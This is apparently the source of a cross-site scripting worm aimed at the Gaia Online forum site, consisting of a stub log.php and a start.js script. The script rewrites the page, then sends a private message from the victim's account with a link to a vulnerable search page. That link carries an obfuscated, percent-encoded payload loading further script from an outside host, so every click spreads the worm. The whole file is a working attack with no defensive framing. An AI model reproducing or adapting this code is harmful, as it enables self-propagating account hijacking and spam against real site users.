-----log.php-----
Error!
-----------------
---End log.php---
-----------------
----start.js-----
// Content to replace div "content" with.
var newContent = '
';
//XSS vector
var spreadOne = "http://www.gaiaonline.com/community/search.php?val="
//Replace content with newContent
document.getElementById("content").innerHTML=newContent;
//Detect which method of XHR to use.
var xmlhttp;
try {
// Mozilla / Safari / IE7
xmlhttp = new XMLHttpRequest();
} catch (e) {
// IE
var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0',
'MSXML2.XMLHTTP.4.0',
'MSXML2.XMLHTTP.3.0',
'MSXML2.XMLHTTP',
'Microsoft.XMLHTTP' );
var success = false;
for (var i=0;i < XMLHTTP_IDS.length && !success; i++) {
try {
xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]);
success = true;
} catch (e) {}
}
if (!success) {
throw new Error('Unable to create XMLHttpRequest.');
}
}
// URI to POST data to.
var targetURI = "/profile/privmsg.php";
//Parameters to pass to targetURI
var params = "mode=post&username=friends@gaia&subject=Check this out&folder=inbox&post=true&message=You should go check [url=" + spreadOne + escape('%22%3E%3Csc%72%69%70t%20defer%20%73%72%63%3D%2F/viewfor%2E%73%69%74%65%2E%63%6F%6D%2F%61%73%74%61%72%74%2E%6A%73%3E%3C/sc%72%69%70t%3E%3C%73%74%79%6C%65%3E') + "]this[/url] out.";
//Start XHR
xmlhttp.open("POST", targetURI, true);
//Set proper headers.
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", params.length);
xmlhttp.setRequestHeader("Connection", "close");
// Send the parameters to the target. In this case, the "Check this out" PM.
xmlhttp.send(params);
-----------------
--End start.js---
